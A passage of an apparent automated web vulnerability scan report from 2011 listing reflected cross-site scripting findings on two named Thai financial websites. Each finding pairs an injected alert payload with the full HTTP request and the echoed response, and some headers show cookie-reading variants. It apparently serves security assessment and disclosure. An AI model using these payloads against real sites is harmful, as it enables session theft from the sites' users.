The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ada8"><img%20src%3da%20onerror%3dalert(1)>159820e6735 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ada8\"><img src=a onerror=alert(1)>159820e6735 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/news.inc.php/5ada8"><img%20src%3da%20onerror%3dalert(1)>159820e6735 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:47 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29513

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/5ada8\"><img src=a onerror=alert(1)>159820e6735" title="THAI">
...[SNIP]...

5.134. http://www.ktam.co.th/en/index.php/news.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/news.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5a99"><img%20src%3da%20onerror%3dalert(1)>0012edab763 was submitted in the REST URL parameter 3. This input was echoed as f5a99\"><img src=a onerror=alert(1)>0012edab763 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/news.phpf5a99"><img%20src%3da%20onerror%3dalert(1)>0012edab763 HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:45:25 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29519

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/news.phpf5a99\"><img src=a onerror=alert(1)>0012edab763" title="THAI">
...[SNIP]...

5.135. http://www.ktam.co.th/en/index.php/news.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/news.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e79"><img%20src%3da%20onerror%3dalert(1)>d62e7af8df0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 44e79\"><img src=a onerror=alert(1)>d62e7af8df0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/news.php/44e79"><img%20src%3da%20onerror%3dalert(1)>d62e7af8df0 HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:52 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29511

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/44e79\"><img src=a onerror=alert(1)>d62e7af8df0" title="THAI">
...[SNIP]...

5.136. http://www.ktam.co.th/en/index.php/self_discovery.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/self_discovery.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47831"><img%20src%3da%20onerror%3dalert(1)>8021380eea4 was submitted in the REST URL parameter 3. This input was echoed as 47831\"><img src=a onerror=alert(1)>8021380eea4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/self_discovery.php47831"><img%20src%3da%20onerror%3dalert(1)>8021380eea4 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eaf4f8f44d0f
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:43:52 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29531

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/self_discovery.php47831\"><img src=a onerror=alert(1)>8021380eea4" title="THAI">
...[SNIP]...

5.137. http://www.ktam.co.th/en/index.php/self_discovery.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/self_discovery.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aef9"><img%20src%3da%20onerror%3dalert(1)>64ef3172b91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5aef9\"><img src=a onerror=alert(1)>64ef3172b91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/self_discovery.php/5aef9"><img%20src%3da%20onerror%3dalert(1)>64ef3172b91 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eaf4f8f44d0f
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:43:37 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29513

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/5aef9\"><img src=a onerror=alert(1)>64ef3172b91" title="THAI">
...[SNIP]...

5.138. http://www.ktam.co.th/en/index.php/style/news.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/style/news.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b8a3"><img%20src%3da%20onerror%3dalert(1)>d45478a1f97 was submitted in the REST URL parameter 4. This input was echoed as 9b8a3\"><img src=a onerror=alert(1)>d45478a1f97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/style/news.php9b8a3"><img%20src%3da%20onerror%3dalert(1)>d45478a1f97 HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:51 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29519

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/news.php9b8a3\"><img src=a onerror=alert(1)>d45478a1f97" title="THAI">
...[SNIP]...

5.139. http://www.ktam.co.th/en/index.php/style/news.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/style/news.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5033b"><img%20src%3da%20onerror%3dalert(1)>adcf6bb96be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5033b\"><img src=a onerror=alert(1)>adcf6bb96be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/style/news.php/5033b"><img%20src%3da%20onerror%3dalert(1)>adcf6bb96be HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:56 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29511

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/5033b\"><img src=a onerror=alert(1)>adcf6bb96be" title="THAI">
...[SNIP]...

5.140. http://www.ktam.co.th/en/index.php/style/page.txt [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/style/page.txt

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5cb8"><img%20src%3da%20onerror%3dalert(1)>a6dc4d6ba07 was submitted in the REST URL parameter 4. This input was echoed as a5cb8\"><img src=a onerror=alert(1)>a6dc4d6ba07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/style/page.txta5cb8"><img%20src%3da%20onerror%3dalert(1)>a6dc4d6ba07 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:49 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29521

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/page.txta5cb8\"><img src=a onerror=alert(1)>a6dc4d6ba07" title="THAI">
...[SNIP]...

5.141. http://www.scb.co.th/en/home [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 82e77--><script>alert(1)</script>7483192efc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en82e77--><script>alert(1)</script>7483192efc4/home HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Siam+Commercial+Bank
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:31:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=7aiuv041g829i4m2vauvbc4c16; path=/
Expires: Wed, 03 Nov 2010 12:31:05 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 699

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en82e77--><script>alert(1)</script>7483192efc4/home -->
...[SNIP]...

5.142. http://www.scb.co.th/en/home [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 71bd6--><script>alert(1)</script>bfc82f87338 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/home71bd6--><script>alert(1)</script>bfc82f87338 HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Siam+Commercial+Bank
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:31:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=16lur0dnjbg6ckb0jc7r7ejhv4; path=/
Expires: Wed, 03 Nov 2010 12:31:07 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 699

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en/home71bd6--><script>alert(1)</script>bfc82f87338 -->
...[SNIP]...

5.143. http://www.scb.co.th/en/home/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 17b7c--><script>alert(1)</script>59c19846c77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en17b7c--><script>alert(1)</script>59c19846c77/home/ HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/landing.html

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:33:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=l8d5qul39rmdtct59c0ei8em56; path=/
Expires: Wed, 03 Nov 2010 12:33:54 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 700

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en17b7c--><script>alert(1)</script>59c19846c77/home/ -->
...[SNIP]...

5.144. http://www.scb.co.th/en/home/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload a128d--><script>alert(1)</script>4d85dcd8997 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/homea128d--><script>alert(1)</script>4d85dcd8997/ HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/landing.html

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:33:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=sm7i78e3e90dv9b6vjcpqjmdg5; path=/
Expires: Wed, 03 Nov 2010 12:33:56 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 700

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en/homea128d--><script>alert(1)</script>4d85dcd8997/ -->
...[SNIP]...

5.145. http://www.scb.co.th/en/home/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 8a509--><script>alert(1)</script>b411353eb84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en8a509--><script>alert(1)</script>b411353eb84/home/favicon.ico HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=ms381nomj10vb6ipcub0ta3jg4

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:33:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:33:53 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 711

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en8a509--><script>alert(1)</script>b411353eb84/home/favicon.ico -->
...[SNIP]...

5.146. http://www.scb.co.th/en/home/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload df8b4--><script>alert(1)</script>19e5b79ab6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/homedf8b4--><script>alert(1)</script>19e5b79ab6d/favicon.ico HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=ms381nomj10vb6ipcub0ta3jg4

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:33:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:33:55 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 711

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en/homedf8b4--><script>alert(1)</script>19e5b79ab6d/favicon.ico -->
...[SNIP]...

5.147. http://www.scb.co.th/en/home/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload f12c1--><script>alert(1)</script>d4304ced27a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/home/favicon.icof12c1--><script>alert(1)</script>d4304ced27a HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=ms381nomj10vb6ipcub0ta3jg4

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:33:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:33:57 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 711

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en/home/favicon.icof12c1--><script>alert(1)</script>d4304ced27a -->
...[SNIP]...

5.148. http://www.scb.co.th/en/home/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1eab2--><script>alert(1)</script>41a3f37f580 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/home/favicon.ico?1eab2--><script>alert(1)</script>41a3f37f580=1 HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
